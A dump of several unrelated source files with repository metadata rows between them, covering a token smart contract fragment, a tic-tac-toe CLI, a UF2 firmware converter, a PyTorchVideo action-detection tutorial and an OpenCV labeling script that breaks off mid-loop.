if not _transfer(_context, _spender, _to, _amount):
return False
SafePut(_context, approve_key, approve_amount)
Notify(["transferFrom", _owner, _spender, _to, _amount])
return True
def _approve(_context, _from, _to, _amount):
RequireScriptHash(_to) # to-address validation
Require(_amount >= 0) # amount must be not minus value
from_val = _balanceOf(_context, _from)
approved_val = _allowance(_context, _from, _to)
approve_val = Add(approved_val, _amount)
Require(from_val >= approve_val) # the token owner must have the amount over approved
approve_key = concat(ALLOWANCE_PREFIX, concat(_from, _to))
SafePut(_context, approve_key, approve_val)
return True
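# Storage-layout note, grounded in the concat calls above: the allowance from
# address A to address B lives under the key '___allow' + A + B, so
# _allowance(ctx, A, B) reads back exactly what _approve wrote for that pair.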
def _burn(_context, _account, _amount):
Require(_amount > 0) # the amount to burn should be over 0
account_val = _balanceOf(_context, _account)
total_supply = _totalSupply(_context)
Require(_amount < total_supply) # should be not over total supply
# burn the token from account. It also subtract the total supply
account_val = Sub(account_val, _amount)
total_supply = Sub(total_supply, _amount)
SafePut(_context, concat(OWN_PREFIX, _account), account_val)
SafePut(_context, MST_SUPPLY_KEY, total_supply)
Notify(["burn", _account, _amount])
return True
def _mint(_context, _to, _amount):
Require(_amount > 0) # mint value must be over 0
    RequireScriptHash(_to)                  # to-address validation
total_supply = _totalSupply(_context)
to_val = _balanceOf(_context, _to)
# Add total supply value and give the token to the to-address
total_supply += _amount
to_val += _amount
SafePut(_context, MST_SUPPLY_KEY, total_supply)
SafePut(_context, concat(OWN_PREFIX, _to), to_val)
Notify(["mint", _to, _amount])
return True
def _transferOwnership(_context, _account):
RequireScriptHash(_account)
Put(_context, OWNER_KEY, _account)
Notify(["transferOwnership", _account])
return True
################################################################################
# modifiers
def _onlyOwner(_context):
"""
Checks the invoker is the contract owner or not. Owner key is saved in the
storage key `___OWNER`, so check its value and invoker.
"""
RequireWitness(Get(_context, OWNER_KEY))
################################################################################
def _totalSupply(_context):
return Get(_context, MST_SUPPLY_KEY)
def _allowance(_context, _from, _to):
return Get(_context, concat(ALLOWANCE_PREFIX, concat(_from, _to)))
| 30.2
| 105
| 0.643175
|
4a14529b15d355c945f368baa671d611d064ec7a
| 1,534
|
py
|
Python
|
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
tictactoe/cli.py
|
luisds95/tictactoe-python
|
9765556372e303943bea82b85264e3fdca25a254
|
[
"MIT"
] | null | null | null |
import logging
import click
from tictactoe.agent import AgentIsNotTrainableError, TrainableAgent
from tictactoe.environment import DICT_DATABASE_FILE
from tictactoe.game.play import Game
from tictactoe.log.logger import TrainingLogger
@click.group()
def main():
pass
@main.command()
@click.argument("P1", default="human")
@click.argument("P2", default="random")
@click.option("--n-games", default=1, help="Number of games to play", type=int)
@click.option("--loud/--quiet", default=None, help="Level of verbosity")
@click.option("--train/--no-train", help="Should train non-human players")
@click.option("--database", default=str(DICT_DATABASE_FILE), type=str)
def play(
p1: str, p2: str, n_games: int, loud: bool, train: bool, database: str
) -> None:
"""
Play a tic tac toe game. Possible players: human, random, searcher
"""
frequency = 1 if loud else 1000
logger = TrainingLogger(frequency=frequency, handler=click.echo)
if loud or "human" in (p1, p2):
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
game = Game(p1, p2, database_str=database, logger=logger)
if train:
p1_agent, _ = game.agents
if isinstance(p1_agent, TrainableAgent):
logger.log("Starting training", force=True)
p1_agent.train()
else:
raise AgentIsNotTrainableError
else:
game.play(n=n_games)
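# Command-line usage sketch (assuming the package installs a `tictactoe`
# entry point; the player names come from the docstring above):
#
#   tictactoe play human random --n-games 3
#   tictactoe play searcher random --train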
@main.command()
def start_api():
from tictactoe.app import app
app.run()
| 28.407407
| 79
| 0.683181
|
4a145301dd2fc48a358bd05e8cd75009a62affa5
| 111
|
py
|
Python
|
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
maximum_sum_bst_in_binary_tree.py
|
pranavdave893/Leetcode
|
1f30ea37af7b60585d168b15d9397143f53c92a1
|
[
"MIT"
] | null | null | null |
https://leetcode.com/problems/maximum-sum-bst-in-binary-tree/discuss/571513/python-recursion-easy-to-understand
| 111
| 111
| 0.837838
|
4a145373ffcfe977adb104051521a6390919b264
| 622
|
py
|
Python
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
env/lib/python3.8/site-packages/plotly/validators/scatter3d/marker/colorbar/_tickformatstopdefaults.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class TickformatstopdefaultsValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self,
plotly_name="tickformatstopdefaults",
parent_name="scatter3d.marker.colorbar",
**kwargs
):
super(TickformatstopdefaultsValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Tickformatstop"),
data_docs=kwargs.pop(
"data_docs",
"""
""",
),
**kwargs
)
| 28.272727
| 86
| 0.606109
|
4a1455e0416c7a9dbab669876d871312c24fae81
| 9,260
|
py
|
Python
|
boards/milador-nrf52-0.1.0/tools/uf2conv/uf2conv.py
|
milador/milador-arduino
|
d0f9ebe33e0e67a921f96d0e278d9d646b8bad91
|
[
"MIT"
] | 54
|
2020-09-04T12:02:30.000Z
|
2022-03-27T21:17:02.000Z
|
packages/framework-arduinoadafruitnrf52/tools/uf2conv/uf2conv.py
|
jeffc/nrf52-watch
|
f59b5f3295a3b42abadb2083eed439bf24fdff7d
|
[
"MIT"
] | 16
|
2020-09-04T14:36:14.000Z
|
2022-01-13T03:29:27.000Z
|
packages/framework-arduinoadafruitnrf52/tools/uf2conv/uf2conv.py
|
jeffc/nrf52-watch
|
f59b5f3295a3b42abadb2083eed439bf24fdff7d
|
[
"MIT"
] | 10
|
2020-09-04T22:54:57.000Z
|
2021-12-10T14:20:31.000Z
|
#!/usr/bin/env python3
import sys
import struct
import subprocess
import re
import os
import os.path
import argparse
UF2_MAGIC_START0 = 0x0A324655 # "UF2\n"
UF2_MAGIC_START1 = 0x9E5D5157 # Randomly selected
UF2_MAGIC_END = 0x0AB16F30 # Ditto
families = {
'SAMD21': 0x68ed2b88,
'SAMD51': 0x55114460,
'NRF52': 0x1b57745f,
'STM32F1': 0x5ee21072,
'STM32F4': 0x57755a57,
'ATMEGA32': 0x16573617,
}
INFO_FILE = "/INFO_UF2.TXT"
appstartaddr = 0x2000
familyid = 0x0
def is_uf2(buf):
w = struct.unpack("<II", buf[0:8])
return w[0] == UF2_MAGIC_START0 and w[1] == UF2_MAGIC_START1
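# A hedged sanity-check sketch: the first eight bytes of a UF2 block are the
# two little-endian magic words defined above, so
#   is_uf2(b"UF2\n" + b"\x57\x51\x5d\x9e")   # -> True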
def is_hex(buf):
try:
w = buf[0:30].decode("utf-8")
except UnicodeDecodeError:
return False
if w[0] == ':' and re.match(b"^[:0-9a-fA-F\r\n]+$", buf):
return True
return False
def convert_from_uf2(buf):
global appstartaddr
numblocks = len(buf) // 512
curraddr = None
outp = b""
for blockno in range(numblocks):
ptr = blockno * 512
block = buf[ptr:ptr + 512]
hd = struct.unpack(b"<IIIIIIII", block[0:32])
if hd[0] != UF2_MAGIC_START0 or hd[1] != UF2_MAGIC_START1:
print("Skipping block at " + ptr + "; bad magic")
continue
if hd[2] & 1:
# NO-flash flag set; skip block
continue
datalen = hd[4]
if datalen > 476:
assert False, "Invalid UF2 data size at " + ptr
newaddr = hd[3]
        if curraddr is None:
appstartaddr = newaddr
curraddr = newaddr
padding = newaddr - curraddr
        if padding < 0:
            assert False, "Block out of order at " + str(ptr)
        if padding > 10*1024*1024:
            assert False, "More than 10M of padding needed at " + str(ptr)
        if padding % 4 != 0:
            assert False, "Non-word padding size at " + str(ptr)
while padding > 0:
padding -= 4
outp += b"\x00\x00\x00\x00"
outp += block[32 : 32 + datalen]
curraddr = newaddr + datalen
return outp
def convert_to_carray(file_content):
outp = "const unsigned char bindata[] __attribute__((aligned(16))) = {"
for i in range(len(file_content)):
if i % 16 == 0:
outp += "\n"
outp += "0x%02x, " % ord(file_content[i])
outp += "\n};\n"
return outp
def convert_to_uf2(file_content):
global familyid
datapadding = b""
while len(datapadding) < 512 - 256 - 32 - 4:
datapadding += b"\x00\x00\x00\x00"
numblocks = (len(file_content) + 255) // 256
outp = b""
for blockno in range(numblocks):
ptr = 256 * blockno
chunk = file_content[ptr:ptr + 256]
flags = 0x0
if familyid:
flags |= 0x2000
hd = struct.pack(b"<IIIIIIII",
UF2_MAGIC_START0, UF2_MAGIC_START1,
flags, ptr + appstartaddr, 256, blockno, numblocks, familyid)
while len(chunk) < 256:
chunk += b"\x00"
block = hd + chunk + datapadding + struct.pack(b"<I", UF2_MAGIC_END)
assert len(block) == 512
outp += block
return outp
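# Layout of each 512-byte block produced above (offsets follow from the code):
#   bytes   0-31    eight little-endian uint32 header words (START0, START1,
#                   flags, target address, payload size = 256, block number,
#                   total blocks, familyID)
#   bytes  32-287   256 bytes of payload (zero-padded)
#   bytes 288-507   zero padding
#   bytes 508-511   UF2_MAGIC_END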
class Block:
def __init__(self, addr):
self.addr = addr
self.bytes = bytearray(256)
def encode(self, blockno, numblocks):
global familyid
flags = 0x0
if familyid:
flags |= 0x2000
hd = struct.pack("<IIIIIIII",
UF2_MAGIC_START0, UF2_MAGIC_START1,
flags, self.addr, 256, blockno, numblocks, familyid)
hd += self.bytes[0:256]
while len(hd) < 512 - 4:
hd += b"\x00"
hd += struct.pack("<I", UF2_MAGIC_END)
return hd
def convert_from_hex_to_uf2(buf):
global appstartaddr
appstartaddr = None
upper = 0
currblock = None
blocks = []
for line in buf.split('\n'):
if line[0] != ":":
continue
i = 1
rec = []
while i < len(line) - 1:
rec.append(int(line[i:i+2], 16))
i += 2
tp = rec[3]
if tp == 4:
upper = ((rec[4] << 8) | rec[5]) << 16
elif tp == 2:
upper = ((rec[4] << 8) | rec[5]) << 4
assert (upper & 0xffff) == 0
elif tp == 1:
break
elif tp == 0:
addr = upper | (rec[1] << 8) | rec[2]
            if appstartaddr is None:
appstartaddr = addr
i = 4
while i < len(rec) - 1:
if not currblock or currblock.addr & ~0xff != addr & ~0xff:
currblock = Block(addr & ~0xff)
blocks.append(currblock)
currblock.bytes[addr & 0xff] = rec[i]
addr += 1
i += 1
numblocks = len(blocks)
resfile = b""
for i in range(0, numblocks):
resfile += blocks[i].encode(i, numblocks)
return resfile
def get_drives():
drives = []
if sys.platform == "win32":
        r = subprocess.check_output(["wmic", "PATH", "Win32_LogicalDisk",
                                     "get", "DeviceID,", "VolumeName,",
                                     "FileSystem,", "DriveType"]).decode()
        for line in r.split('\n'):
            words = re.split(r'\s+', line)
if len(words) >= 3 and words[1] == "2" and words[2] == "FAT":
drives.append(words[0])
else:
rootpath = "/media"
if sys.platform == "darwin":
rootpath = "/Volumes"
elif sys.platform == "linux":
tmp = rootpath + "/" + os.environ["USER"]
if os.path.isdir(tmp):
rootpath = tmp
for d in os.listdir(rootpath):
drives.append(os.path.join(rootpath, d))
def has_info(d):
try:
return os.path.isfile(d + INFO_FILE)
except:
return False
return list(filter(has_info, drives))
def board_id(path):
with open(path + INFO_FILE, mode='r') as file:
file_content = file.read()
return re.search("Board-ID: ([^\r\n]*)", file_content).group(1)
def list_drives():
for d in get_drives():
print(d, board_id(d))
def write_file(name, buf):
with open(name, "wb") as f:
f.write(buf)
print("Wrote %d bytes to %s." % (len(buf), name))
def main():
global appstartaddr, familyid
def error(msg):
print(msg)
sys.exit(1)
parser = argparse.ArgumentParser(description='Convert to UF2 or flash directly.')
parser.add_argument('input', metavar='INPUT', type=str, nargs='?',
help='input file (HEX, BIN or UF2)')
parser.add_argument('-b' , '--base', dest='base', type=str,
default="0x2000",
help='set base address of application for BIN format (default: 0x2000)')
parser.add_argument('-o' , '--output', metavar="FILE", dest='output', type=str,
help='write output to named file; defaults to "flash.uf2" or "flash.bin" where sensible')
parser.add_argument('-d' , '--device', dest="device_path",
help='select a device path to flash')
parser.add_argument('-l' , '--list', action='store_true',
help='list connected devices')
parser.add_argument('-c' , '--convert', action='store_true',
help='do not flash, just convert')
parser.add_argument('-f' , '--family', dest='family', type=str,
default="0x0",
help='specify familyID - number or name (default: 0x0)')
parser.add_argument('-C' , '--carray', action='store_true',
help='convert binary file to a C array, not UF2')
args = parser.parse_args()
appstartaddr = int(args.base, 0)
if args.family.upper() in families:
familyid = families[args.family.upper()]
else:
try:
familyid = int(args.family, 0)
except ValueError:
error("Family ID needs to be a number or one of: " + ", ".join(families.keys()))
if args.list:
list_drives()
else:
if not args.input:
error("Need input file")
with open(args.input, mode='rb') as f:
inpbuf = f.read()
from_uf2 = is_uf2(inpbuf)
ext = "uf2"
if from_uf2:
outbuf = convert_from_uf2(inpbuf)
ext = "bin"
elif is_hex(inpbuf):
outbuf = convert_from_hex_to_uf2(inpbuf.decode("utf-8"))
elif args.carray:
outbuf = convert_to_carray(inpbuf)
ext = "h"
else:
outbuf = convert_to_uf2(inpbuf)
print("Converting to %s, output size: %d, start address: 0x%x" %
(ext, len(outbuf), appstartaddr))
if args.convert:
drives = []
if args.output == None:
args.output = "flash." + ext
else:
drives = get_drives()
if args.output:
write_file(args.output, outbuf)
else:
if len(drives) == 0:
error("No drive to deploy.")
for d in drives:
print("Flashing %s (%s)" % (d, board_id(d)))
write_file(d + "/NEW.UF2", outbuf)
if __name__ == "__main__":
main()
| 31.712329
| 113
| 0.530346
|
4a14565a593c6d0227b61ff7c70a4680a8afde37
| 9,471
|
py
|
Python
|
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
tutorials/video_detection_example/video_detection_inference_tutorial.py
|
Spencer551/pytorchvideo
|
9ee08f3112b5ad007a431cccc26598a1f28cf5b4
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# # Torch Hub Detection Inference Tutorial
#
# In this tutorial you'll learn:
# - how to load a pretrained detection model using Torch Hub
# - run inference to detect actions in a demo video
# ## NOTE:
# At the moment this tutorial only works when run from a local clone, in the directory `pytorchvideo/tutorials/video_detection_example`
# ### Install and Import modules
# If `torch`, `torchvision`, `cv2` and `pytorchvideo` are not installed, run the following cell:
# In[1]:
import os
import sys
import torch
import cv2
import pytorchvideo
from functools import partial
import numpy as np
import detectron2
from detectron2.config import get_cfg
from detectron2 import model_zoo
from detectron2.engine import DefaultPredictor
import pytorchvideo
from pytorchvideo.transforms.functional import (
uniform_temporal_subsample,
short_side_scale_with_boxes,
clip_boxes_to_image,
)
from torchvision.transforms._functional_video import normalize
from pytorchvideo.data.ava import AvaLabeledVideoFramePaths
from pytorchvideo.models.hub import slow_r50_detection # Another option is slowfast_r50_detection
from visualization import VideoVisualizer
# ## Load Model using Torch Hub API
# PyTorchVideo provides several pretrained models through Torch Hub. Available models are described in [model zoo documentation.](https://github.com/facebookresearch/pytorchvideo/blob/main/docs/source/model_zoo.md)
#
# Here we are selecting the slow_r50_detection model which was trained using a 4x16 setting on the Kinetics 400 dataset and
# fine tuned on AVA V2.2 actions dataset.
#
# NOTE: to run on GPU in Google Colab, in the menu bar select: Runtime -> Change runtime type -> Hardware Accelerator -> GPU
# In[3]:
device = 'cuda' # or 'cpu'
video_model = slow_r50_detection(True) # Another option is slowfast_r50_detection
video_model = video_model.eval().to(device)
# ## Load an off-the-shelf Detectron2 object detector
#
# We use the object detector to detect bounding boxes for the people.
# These bounding boxes later feed into our video action detection model.
# For more details, please refer to the Detectron2's object detection tutorials.
#
# To install Detectron2, please follow the instructions mentioned [here](https://github.com/facebookresearch/detectron2/blob/main/INSTALL.md)
# In[4]:
cfg = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file("COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml"))
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.55 # set threshold for this model
cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url("COCO-Detection/faster_rcnn_R_50_FPN_3x.yaml")
predictor = DefaultPredictor(cfg)
# This method takes in an image and generates the bounding boxes for people in the image.
def get_person_bboxes(inp_img, predictor):
predictions = predictor(inp_img.cpu().detach().numpy())['instances'].to('cpu')
boxes = predictions.pred_boxes if predictions.has("pred_boxes") else None
scores = predictions.scores if predictions.has("scores") else None
classes = np.array(predictions.pred_classes.tolist() if predictions.has("pred_classes") else None)
predicted_boxes = boxes[np.logical_and(classes==0, scores>0.75 )].tensor.cpu() # only person
return predicted_boxes
# ## Define the transformations for the input required by the model
# Before passing the video and bounding boxes into the model we need to apply some input transforms and sample a clip of the correct frame rate in the clip.
#
# Here, below we define a method that can pre-process the clip and bounding boxes. It generates inputs accordingly for both Slow (Resnet) and SlowFast models depending on the parameterization of the variable `slow_fast_alpha`.
# In[14]:
def ava_inference_transform(
clip,
boxes,
num_frames = 4, #if using slowfast_r50_detection, change this to 32
crop_size = 256,
data_mean = [0.45, 0.45, 0.45],
data_std = [0.225, 0.225, 0.225],
slow_fast_alpha = None, #if using slowfast_r50_detection, change this to 4
):
boxes = np.array(boxes)
ori_boxes = boxes.copy()
# Image [0, 255] -> [0, 1].
clip = uniform_temporal_subsample(clip, num_frames)
clip = clip.float()
clip = clip / 255.0
height, width = clip.shape[2], clip.shape[3]
# The format of boxes is [x1, y1, x2, y2]. The input boxes are in the
# range of [0, width] for x and [0,height] for y
boxes = clip_boxes_to_image(boxes, height, width)
# Resize short side to crop_size. Non-local and STRG uses 256.
clip, boxes = short_side_scale_with_boxes(
clip,
size=crop_size,
boxes=boxes,
)
# Normalize images by mean and std.
clip = normalize(
clip,
np.array(data_mean, dtype=np.float32),
np.array(data_std, dtype=np.float32),
)
boxes = clip_boxes_to_image(
boxes, clip.shape[2], clip.shape[3]
)
# Incase of slowfast, generate both pathways
if slow_fast_alpha is not None:
fast_pathway = clip
# Perform temporal sampling from the fast pathway.
slow_pathway = torch.index_select(
clip,
1,
torch.linspace(
0, clip.shape[1] - 1, clip.shape[1] // slow_fast_alpha
).long(),
)
clip = [slow_pathway, fast_pathway]
return clip, torch.from_numpy(boxes), ori_boxes
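# A minimal usage sketch (shapes are illustrative, not prescriptive): `clip` is
# expected as a (C, T, H, W) tensor with values in [0, 255] and `boxes` as an
# array of [x1, y1, x2, y2] pixel coordinates, e.g.
#
#   inputs, inp_boxes, _ = ava_inference_transform(clip, boxes.numpy())
#
# which is exactly how the inference loop below calls it.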
# ## Setup
#
# Download the id to label mapping for the AVA V2.2 dataset on which the Torch Hub models were finetuned.
# This will be used to get the category label names from the predicted class ids.
#
# Create a visualizer to visualize and plot the results(labels + bounding boxes).
# In[43]:
get_ipython().system('wget https://dl.fbaipublicfiles.com/pytorchvideo/data/class_names/ava_action_list.pbtxt')
# In[8]:
# Create an id to label name mapping
label_map, allowed_class_ids = AvaLabeledVideoFramePaths.read_label_map('ava_action_list.pbtxt')
# Create a video visualizer that can plot bounding boxes and visualize actions on bboxes.
video_visualizer = VideoVisualizer(81, label_map, top_k=3, mode="thres",thres=0.5)
# ## Load an example video
# We get an opensourced video off the web from WikiMedia.
# In[42]:
get_ipython().system('wget https://dl.fbaipublicfiles.com/pytorchvideo/projects/theatre.webm')
# In[6]:
# Load the video
encoded_vid = pytorchvideo.data.encoded_video.EncodedVideo.from_path('theatre.webm')
print('Completed loading encoded video.')
# ## Generate bounding boxes and action predictions for a 10 second clip in the video.
# In[19]:
# Video predictions are generated at an interval of 1 sec from 90 seconds to 100 seconds in the video.
time_stamp_range = range(90,100) # time stamps in video for which clip is sampled.
clip_duration = 1.0 # Duration of clip used for each inference step.
gif_imgs = []
for time_stamp in time_stamp_range:
print("Generating predictions for time stamp: {} sec".format(time_stamp))
# Generate clip around the designated time stamps
inp_imgs = encoded_vid.get_clip(
time_stamp - clip_duration/2.0, # start second
time_stamp + clip_duration/2.0 # end second
)
inp_imgs = inp_imgs['video']
    # Generate people bbox predictions using Detectron2's off-the-shelf pre-trained predictor.
    # We use the middle image in each clip to generate the bounding boxes.
inp_img = inp_imgs[:,inp_imgs.shape[1]//2,:,:]
inp_img = inp_img.permute(1,2,0)
# Predicted boxes are of the form List[(x_1, y_1, x_2, y_2)]
predicted_boxes = get_person_bboxes(inp_img, predictor)
if len(predicted_boxes) == 0:
print("Skipping clip no frames detected at time stamp: ", time_stamp)
continue
# Preprocess clip and bounding boxes for video action recognition.
inputs, inp_boxes, _ = ava_inference_transform(inp_imgs, predicted_boxes.numpy())
# Prepend data sample id for each bounding box.
    # For more details refer to RoIAlign in Detectron2
inp_boxes = torch.cat([torch.zeros(inp_boxes.shape[0],1), inp_boxes], dim=1)
# Generate actions predictions for the bounding boxes in the clip.
# The model here takes in the pre-processed video clip and the detected bounding boxes.
if isinstance(inputs, list):
inputs = [inp.unsqueeze(0).to(device) for inp in inputs]
else:
inputs = inputs.unsqueeze(0).to(device)
preds = video_model(inputs, inp_boxes.to(device))
    preds = preds.to('cpu')
# The model is trained on AVA and AVA labels are 1 indexed so, prepend 0 to convert to 0 index.
preds = torch.cat([torch.zeros(preds.shape[0],1), preds], dim=1)
# Plot predictions on the video and save for later visualization.
inp_imgs = inp_imgs.permute(1,2,3,0)
inp_imgs = inp_imgs/255.0
out_img_pred = video_visualizer.draw_clip_range(inp_imgs, preds, predicted_boxes)
gif_imgs += out_img_pred
print("Finished generating predictions.")
# ## Save predictions as video
# The generated video consists of bounding boxes with predicted actions for each bounding box.
# In[20]:
height, width = gif_imgs[0].shape[0], gif_imgs[0].shape[1]
video_save_path = 'output_detections.mp4'
video = cv2.VideoWriter(video_save_path, cv2.VideoWriter_fourcc(*'DIVX'), 7, (width, height))
for image in gif_imgs:
img = (255*image).astype(np.uint8)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
video.write(img)
video.release()
print('Predictions are saved to the video file: ', video_save_path)
# In[ ]:
| 34.191336
| 226
| 0.729596
|
4a145684e9dc7dc867ab44e4532c8c415b324673
| 6,858
|
py
|
Python
|
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
data_labeling/generate_semantic_non_circle_label.py
|
chansoopark98/hole-detection
|
76e47057b1e186d4e2f5db2b5b2bb1074b849078
|
[
"MIT"
] | null | null | null |
import argparse
import os
import tensorflow as tf
import glob
import cv2
import numpy as np
import math
from pathlib import Path
import natsort
import re
file_pattern = re.compile(r'.*?(\d+).*?')
def get_order(file):
match = file_pattern.match(Path(file).name)
if not match:
return math.inf
return int(match.groups()[0])
def onMouse(event, x, y, flags, param):
    # event == 10: mouse wheel scroll
    # event == 3: middle (wheel) button click
    filled = 5
    if event == cv2.EVENT_LBUTTONDOWN:  # left mouse button pressed
rgb_x = param[2]
rgb_y = param[3]
# param[0][y, x] = (0, 255, 0)
param[1][rgb_y + y, rgb_x + x] = 2
area = param[0][y- param[4] : y + param[4], x - param[4] : x + param[4]]
if np.any(area == (0, 255, 0)):
param[0][y- filled : y + filled, x - filled : x + filled] = (0, 255, 0)
new_v = np.where(abs(area - param[0][y, x]) <=(param[5], param[5] ,param[5]), (0, 255, 0), area)
param[0][y- param[4] : y + param[4], x - param[4] : x + param[4]] = new_v
semantic_v = np.where(new_v == (0, 255, 0), 2, 0)
param[1][(rgb_y + y) - param[4]:(rgb_y + y) + param[4], (rgb_x + x) - param[4] : (rgb_x + x) + param[4]] = semantic_v[:, :, 0]
    if event == 3:  # middle (wheel) button click
rgb_x = param[2]
rgb_y = param[3]
param[0][y- filled : y + filled, x - filled : x + filled] = 0
param[1][(rgb_y + y) - filled:(rgb_y + y) + filled, (rgb_x + x) - filled : (rgb_x + x) + filled] = 0
cv2.imshow('draw_img',param[0])
cv2.resizeWindow('draw_img', IMAGE_SIZE[1], IMAGE_SIZE[0])
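# The `param` list handed to onMouse packs, in order (grounded in the
# setMouseCallback call inside the main loop below):
#   param[0] draw_img    - ROI copy being annotated
#   param[1] draw_result - full-frame label mask (class id 2 marks annotations)
#   param[2], param[3]   - x / y offset of the ROI inside the full frame
#   param[4], param[5]   - kernel_size and threshold trackbar values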
parser = argparse.ArgumentParser()
parser.add_argument("--rgb_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/rgb/')
parser.add_argument("--mask_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/mask/')
parser.add_argument("--result_path", type=str, help="raw image path", default='./data_labeling/data/img/0321/032110_white_r1_40cm/result/semantic_label')
args = parser.parse_args()
RGB_PATH = args.rgb_path
MASK_PATH = args.mask_path
RESULT_DIR = args.result_path
RESOLUTION = (640,480)
MASK_RESULT_DIR = RESULT_DIR + '_mask_result/'
IMAGE_SIZE = (480, 640)
# IMAGE_SIZE = (None, None)
ROI_PATH = MASK_RESULT_DIR + 'roi_mask/'
ROI_INPUT_PATH = ROI_PATH + 'input/'
ROI_GT_PATH = ROI_PATH + 'gt/'
ROI_CHECK_GT_PATH = ROI_PATH + 'check_gt/'
SEMANTIC_PATH = MASK_RESULT_DIR + 'semantic_mask/'
SEMANTIC_INPUT_PATH = SEMANTIC_PATH + 'input/'
SEMANTIC_GT_PATH = SEMANTIC_PATH + 'gt/'
SEMANTIC_CHECK_GT_PATH = SEMANTIC_PATH + 'check_gt/'
os.makedirs(MASK_RESULT_DIR, exist_ok=True)
os.makedirs(ROI_PATH, exist_ok=True)
os.makedirs(ROI_INPUT_PATH, exist_ok=True)
os.makedirs(ROI_GT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_PATH, exist_ok=True)
os.makedirs(SEMANTIC_INPUT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_GT_PATH, exist_ok=True)
os.makedirs(ROI_CHECK_GT_PATH, exist_ok=True)
os.makedirs(SEMANTIC_CHECK_GT_PATH, exist_ok=True)
rgb_list = glob.glob(os.path.join(RGB_PATH+'*.png'))
rgb_list = natsort.natsorted(rgb_list,reverse=True)
mask_list = glob.glob(os.path.join(MASK_PATH+'*.png'))
mask_list = natsort.natsorted(mask_list,reverse=True)
i = 1
for idx in range(len(rgb_list)):
img = cv2.imread(rgb_list[idx])
gt = cv2.imread(mask_list[idx])
mask = np.where(gt.copy()>= 200, 1.0 , 0)
original = img
result = mask
result= result[:, :, 0].astype(np.uint8)
result_mul = result.copy() * 255
hh, ww = result_mul.shape
contours, _ = cv2.findContours(result_mul, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
circle_contour = []
for contour in contours:
area = cv2.contourArea(contour)
if area >= 1000:
circle_contour.append(contour)
try:
x,y,w,h = cv2.boundingRect(circle_contour[0])
except:
continue
center_x = x + (w/2)
center_y = y + (h/2)
rgb_map = original.copy()
rgb_map = cv2.bitwise_and(rgb_map, rgb_map, mask=result)
# >>>> ROI CROP
ROI = rgb_map.copy()[y:y+h, x:x+w]
# ROI = cv2.resize(ROI, dsize=(w * 4, h * 4), interpolation=cv2.INTER_LINEAR)
# ROI = cv2.GaussianBlur(ROI, (3, 3), 0)
# _, ROI = cv2.threshold(ROI,100,255,cv2.THRESH_BINARY)
# _, ROI = cv2.threshold(ROI,200,255,cv2.THRESH_BINARY)
    # circles = cv2.HoughCircles(ROI, cv2.HOUGH_GRADIENT, 1, 1,
    #                            param1=127, param2=...)
# if circles is not None:
# cx, cy, radius = circles[0][0]
# contours, _ = cv2.findContours(ROI, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# min_area = 999999
# out_contour = []
# for contour in contours:
# area = cv2.contourArea(contour)
# if min_area >= area:
# min_area = area
# out_contour = [contour]
draw_img = ROI.copy()
# cv2.drawContours(draw_img, out_contour, 0, (127, 127, 127), -1)
draw_result = result.copy()
cv2.namedWindow("draw_img")
cv2.moveWindow("draw_img", 800, 400)
cv2.createTrackbar("kernel_size", "draw_img", 1, 30, lambda x : x)
cv2.setTrackbarPos("kernel_size", "draw_img", 13)
cv2.createTrackbar("threshold", "draw_img", 1, 255, lambda x : x)
cv2.setTrackbarPos("threshold", "draw_img", 5)
while cv2.waitKey(1) != ord('q'):
